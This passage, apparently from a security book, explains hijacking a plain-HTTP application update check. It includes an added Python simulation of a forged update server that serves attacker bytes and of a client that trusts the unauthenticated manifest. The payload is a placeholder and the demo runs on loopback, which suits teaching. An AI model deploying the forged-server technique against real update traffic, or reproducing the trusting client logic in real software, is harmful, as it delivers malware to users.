We saw how we could manipulate packets to replace a downloaded executable with our own naughty payload. Now we'll look at a nifty variation on this idea: intercepting the HTTP traffic an application sends when it checks for updates; forging a reply that says yes, your maker has an update for you, tell the user to download it; and then injecting an executable of our choice into the download the application requests next. Nothing in a plain HTTP update check authenticates the reply, so whoever sits on the path gets to decide what "the latest version" is and where it comes from.
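The following is an added example, not code from the book, that models both halves of this exchange on a local port: a forged update server that answers any check with "a newer version exists" and hands out an attacker-controlled binary, and a client with the kind of unauthenticated update logic the attack relies on. The packet interception from the previous section is left out; the simulation simply points the client at the forged server. The protocol (GET /check?v=<version> answered with JSON carrying "version" and "url"), the payload bytes and every name here are assumptions made for illustration.

```python
"""Simulated update-check interception (added example, not from the book).

Models an application whose update check is plain HTTP and an attacker who
answers that check from on-path. The protocol (GET /check?v=<version> ->
JSON {"version", "url"}) and all names are assumptions for illustration.
"""
import json
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Constructed stand-in for the attacker's executable (not a real binary).
FAKE_PAYLOAD = b"MZ\x90\x00 attacker-controlled bytes (constructed sample)"
FORGED_VERSION = "9.9"


class ForgedUpdateServer(BaseHTTPRequestHandler):
    """Plays the vendor's update server from the attacker's position on the path."""

    def do_GET(self):
        url = urlparse(self.path)
        if url.path == "/check":
            # Whatever version the client reports, claim a newer one exists
            # and point the client at a download we control.
            reported = parse_qs(url.query).get("v", ["?"])[0]
            host = self.headers.get("Host", "")
            body = json.dumps({
                "version": FORGED_VERSION,
                "url": f"http://{host}/download/update-{FORGED_VERSION}.exe",
                "note": f"client reported {reported}",
            }).encode()
            self._reply(200, "application/json", body)
        elif url.path.startswith("/download/"):
            # The "update" the client asked for: our payload.
            self._reply(200, "application/octet-stream", FAKE_PAYLOAD)
        else:
            self._reply(404, "text/plain", b"not found")

    def _reply(self, status, ctype, body):
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the example quiet
        pass


def version_tuple(v):
    """'1.2.3' -> (1, 2, 3) so versions compare numerically, not lexically."""
    return tuple(int(x) for x in v.split("."))


def client_update_check(base_url, current_version):
    """The application's unauthenticated update logic, as the attacker exploits it.

    Returns (new_version, downloaded_bytes), or (None, b"") when no update is offered.
    """
    with urllib.request.urlopen(f"{base_url}/check?v={current_version}", timeout=5) as r:
        manifest = json.load(r)
    if version_tuple(manifest["version"]) <= version_tuple(current_version):
        return None, b""
    # Trusts the URL from the manifest: the download comes from wherever the
    # (forged) check response says, with no signature to tie it to the vendor.
    with urllib.request.urlopen(manifest["url"], timeout=5) as r:
        return manifest["version"], r.read()


def run_attack_simulation(current_version="1.0"):
    """Start the forged server on a free loopback port and run one client check."""
    server = HTTPServer(("127.0.0.1", 0), ForgedUpdateServer)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return client_update_check(f"http://127.0.0.1:{port}", current_version)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    version, blob = run_attack_simulation()
    print(f"client accepted 'update' {version}: {len(blob)} bytes from the attacker")
```

The client never questions the manifest: the version number, the download URL and the bytes behind it all arrive over the same unauthenticated channel, which is exactly why forging the check reply is enough to steer it to a payload of the attacker's choosing.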
The update check we're looking at is familiar to most users: when you start up a certain program and, after a few seconds, a window automatically pops up to let you know an update is available. Behind the scenes, the application phones home to do a quick check. It's not much different from the previous injection attack, except this time the application is initiating...